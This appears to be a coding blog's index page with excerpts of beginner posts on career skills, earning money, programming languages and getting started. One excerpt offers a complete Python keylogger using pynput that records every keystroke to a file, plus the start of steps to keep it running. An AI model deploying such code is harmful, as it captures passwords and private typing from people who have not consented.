Posts

Showing posts with the label hacker

5 Skills That Would Level Up your Coding Career

Image
  5 Skills That Would Level Up your Coding Career             Coding is undoubtedly a great skill to master . Sometimes it could be impossible , as the technology is changing everyday . To sustain the position learning a new skill could help a lot . Below are few skills that could help you in your project or getting a job and to stand out .             Few things could be done better by an expert but still knowing these could help in any time . 5 . 3D Modelling :             The ability to create 3D models could come in handy when you wanted to create 3D games , placeholders , VR , animations and lots more . 3D modelling is an in-demand skillset and you may have the need for someone time to time . If you can create one , it could help you a lots of money and time .             One can start with Blender , as it is a powerful open source free software with a huge ...

Hacking With Python in Just 10 lines of Code | Key Logger

Image
Hacking With Python in Just 10 lines of Code - A Key Logger             A KeyLogger logs every stroke of the keyboard into a seperate file . This is a basic keylogger which we can run on a computer we need to log the strokes .  The 2 main Packages needed are : Python Pynput And that is all we needed .  Once you have them installed copy and paste the following code : from pynput.keyboard import Key , Listener keys=[] def on_press(key): keys.append(key) d=open("C:/Users/DELL/Desktop/logofmaniacs.txt","w") d.write(str(keys)) d.close() with Listener(on_press) as listner: listner.join() Save the file in .py extension and Run the Code pressing F5 . The code starts executing and once you start typing a new text file logofmaniacs.txt is created and has all keystrokes logged .  But once the execution is stopped the keylogging also stops . To make it run continuously we create a batch file . Crea...

5 Ways to Make Money Coding

Image
5 Ways to Make Money Coding             You can ofcouse get a Job and make money Coding . But what if you couldn't get a Job or you don't want to get a Job . There are ways you can still earn money at your comfort . Lets see the Top 5 ways you can fill your pockets doing your passion .  5 . Freelancing :             Yes , it is the most Obvious way to make cash with Coding . You don't have to be a pro to sell your service , there could be people who needed small scripts for their projects or an hour of mentoring . Getting the first few orders will be the most difficult job . But after that everything will get in flow .  4 . Bug Bounty :             This is a way where developers can receive recognition and compensation for reporting bugs , especially reagarding security exploits . To maintain their reputation huge companies pay the person who found the bug as a reward . This way of maki...

Top 5 Programming Languages to Learn

Image
Top 5 Programming Languages to Learn                        To Start with a Disclaimer , There is no Best or Worst Language . Each one is unique in its own way . This is only a comparision to help in choosing a language to learn . Basis on which the following List is made :  Trends of the language Companies that are used Available Support , Frameworks and Libraries What can be done with them Job opportunities Learning curve Lets Start on the list from 5 to 1 : 5 . DART :             DART is a programming language initially internally used at Google.It was there since 2011 but only gained attention after the announcement of Flutter beta for cross-platform(both android and IOS) mobile app development. It is simple,modern and highly efficient as apps can be developed with a single code base . Companies Using DART: Google Alibaba Wrike Pick & School 4 . GO Lang :       ...

How to Get Started with Coding | Best Way | 2020

Image
 There are 5 Basic Steps to get Started with Coding . 1. Know Why You wanted To Learn Coding   For Money ? Want to be a Hacker ? Feel cool being a Techie ? Passion ? To Get a Job ? Want to create your own apps ? What's your Reason ? Anything may be the reason . But ultimately you need to love it . Because it is a long hard way . You can't master it in a week or month . It needs years of practice and No one has excelled it still .  2. Learn Programming than jumping into a Language                 Ok , You love coding . What's next ? Choosing a Programming Language ? A Big NO ! I had seen people asking me , "What is the best Programming Language to get Started if I am a Complete Beginner ? "  My Answer is " LEARN WHAT IS PROGRAMMING FIRST " . People see crazy hacking movies and Techies and assume that is programming .  What is Programming ?             Programming is a w...